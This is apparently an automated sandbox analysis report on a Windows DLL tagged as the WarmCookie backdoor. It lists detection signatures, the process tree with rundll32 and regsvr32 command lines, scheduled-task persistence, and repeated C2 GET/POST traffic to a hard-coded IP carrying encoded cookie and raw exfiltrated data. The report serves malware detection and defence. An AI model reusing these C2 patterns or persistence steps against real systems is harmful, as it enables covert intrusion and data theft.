Windows Analysis Report
akdn2nefd.bin.dll

Overview

General Information

Sample name: akdn2nefd.bin.dll (renamed because the original name is a hash value)
Original sample name: akdn2nefd.bin.exe
Analysis ID: 1493196
MD5: 59b7b8d29252a9128536fbd08d24375f
SHA1: 7221b9125608a54f9dd706166f936c16ee23164a
SHA256: b7aec5f73d2a6bbd8cd920edb4760e2edadc98c3a45bf4fa994d47ca9cbd02f6
Tags: backdoor, exe, warmcookie

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates files in the system32 config directory
Drops HTML or HTM files to system directories
Found evasive API chain (may stop execution after checking mutex)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7316 cmdline: loaddll64.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7368 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7392 cmdline: rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • regsvr32.exe (PID: 7376 cmdline: regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • rundll32.exe (PID: 7400 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7456 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServer MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7504 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerEx MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 7568 cmdline: C:\Windows\system32\rundll32.exe "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: C:\ProgramData\Ventuso LLC\Updater.dll; ReversingLabs: Detection: 13%
Source: C:\ProgramData\Ventuso LLC\Updater.dll; Virustotal: Detection: 12%
Source: akdn2nefd.bin.dll; ReversingLabs: Detection: 13%
Source: akdn2nefd.bin.dll; Virustotal: Detection: 12%
Source: akdn2nefd.bin.dll; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: E:\work\ooooooops\181\knock_v1.1.8\knock\bin64\knock.pdb source: rundll32.exe, 00000004.00000003.1777532301.0000016C8D400000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1778367651.0000016C8D405000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp, akdn2nefd.bin.dll, Updater.dll.4.dr
Source: C:\Windows\System32\rundll32.exe; Code function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FFE115015B0
Source: C:\Windows\System32\rundll32.exe; Code function: 8_2_00007FFE11511610 FindFirstFileExA, 8_2_00007FFE11511610

Networking

Source: C:\Windows\System32\rundll32.exe; Network Connect: 72.5.43.29 80
Source: Joe Sandbox View; ASN Name: UNASSIGNED UNASSIGNED
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
  User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
  Host: 72.5.43.29
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
  POST / HTTP/1.1
  Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
  User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
  Host: 72.5.43.29
  Content-Length: 120
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: e4 31 93 8b 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 7b 26 73 32 9b 6e b3 1b ca a1 a7 e7 8f f5 36 22 5c fb 00 56 f2 3e 8d e0 c3 17 d9 5f dd d0 cb b4 1d a7 cc 3f b9 11 97 de 94 d1 ff 36 27 f0 9c 8f 9c 10 ec 74 6a a4 13 e9 c8 ec c6 61 56 e6 b7 2d b2 fe f8 7b 4b cc 17 0e bf 72 29 50 98 a5 bd 77 17 f3 25 e2 91 1f a5 c7 67 c5 ed fe 1f f0 bb 15 eb 2a be 50 73 b1 6c 66
  Data Ascii: 1>Rd{&s2n6"\V>_?6'tjaV-{Kr)Pw%g*Pslf
Source: global traffic; HTTP traffic detected:
  POST / HTTP/1.1
  Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
  User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
  Host: 72.5.43.29
  Content-Length: 776
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 72.5.43.29
Source: C:\Windows\System32\rundll32.exe; Code function: 8_2_00007FFE11501F20 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,wcscpy,wcscat,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 8_2_00007FFE11501F20
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: unknown | HTTP traffic detected:
POST / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: e4 31 93 8b 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 7b 26 73 32 9b 6e b3 1b ca a1 a7 e7 8f f5 36 22 5c fb 00 56 f2 3e 8d e0 c3 17 d9 5f dd d0 cb b4 1d a7 cc 3f b9 11 97 de 94 d1 ff 36 27 f0 9c 8f 9c 10 ec 74 6a a4 13 e9 c8 ec c6 61 56 e6 b7 2d b2 fe f8 7b 4b cc 17 0e bf 72 29 50 98 a5 bd 77 17 f3 25 e2 91 1f a5 c7 67 c5 ed fe 1f f0 bb 15 eb 2a be 50 73 b1 6c 66
Data Ascii: 1>Rd{&s2n6"\V>_?6'tjaV-{Kr)Pw%g*Pslf
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/#tT
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/$
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/2
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/5.43.29/ttingsE
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/Gt8
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/Rt#
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/pt
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.29/ttings
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115070A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetDC,CreateCompatibleDC,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,BitBlt,DeleteObject,DeleteObject,ReleaseDC
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\Tasks\Ventuso LLC.job
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htm
Source: C:\Windows\System32\rundll32.exe | File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htm
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE1150C0EC
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE1150DF94
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11502740
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11513B40
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11507F60
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11518038
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11511404
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11513670
Source: classification engine | Classification label: mal76.evad.winDLL@15/4@0/1
Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\7d0cec31-c3bc-4593-ad4a-8c140904383e
Source: C:\Windows\System32\rundll32.exe | Mutant created: \BaseNamedObjects\7d0cec31-c3bc-4593-ad4a-8c140904383e
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: akdn2nefd.bin.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Source: akdn2nefd.bin.dll | ReversingLabs: Detection: 13%
Source: akdn2nefd.bin.dll | Virustotal: Detection: 12%
Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerEx
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u
Source: C:\Windows\System32\loaddll64.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: akdn2nefd.bin.dll | Static PE information: Image base 0x180000000 > 0x60000000
Source: akdn2nefd.bin.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: akdn2nefd.bin.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: akdn2nefd.bin.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: akdn2nefd.bin.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: akdn2nefd.bin.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: akdn2nefd.bin.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: akdn2nefd.bin.dll | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: E:\work\ooooooops\181\knock_v1.1.8\knock\bin64\knock.pdb | source: rundll32.exe, 00000004.00000003.1777532301.0000016C8D400000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1778367651.0000016C8D405000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp, akdn2nefd.bin.dll, Updater.dll.4.dr
Source: akdn2nefd.bin.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: akdn2nefd.bin.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: akdn2nefd.bin.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: akdn2nefd.bin.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: akdn2nefd.bin.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose

Persistence and Installation Behavior

Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htm
Source: C:\Windows\System32\rundll32.exe | File created: C:\ProgramData\Ventuso LLC\Updater.dll
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\Tasks\Ventuso LLC.job
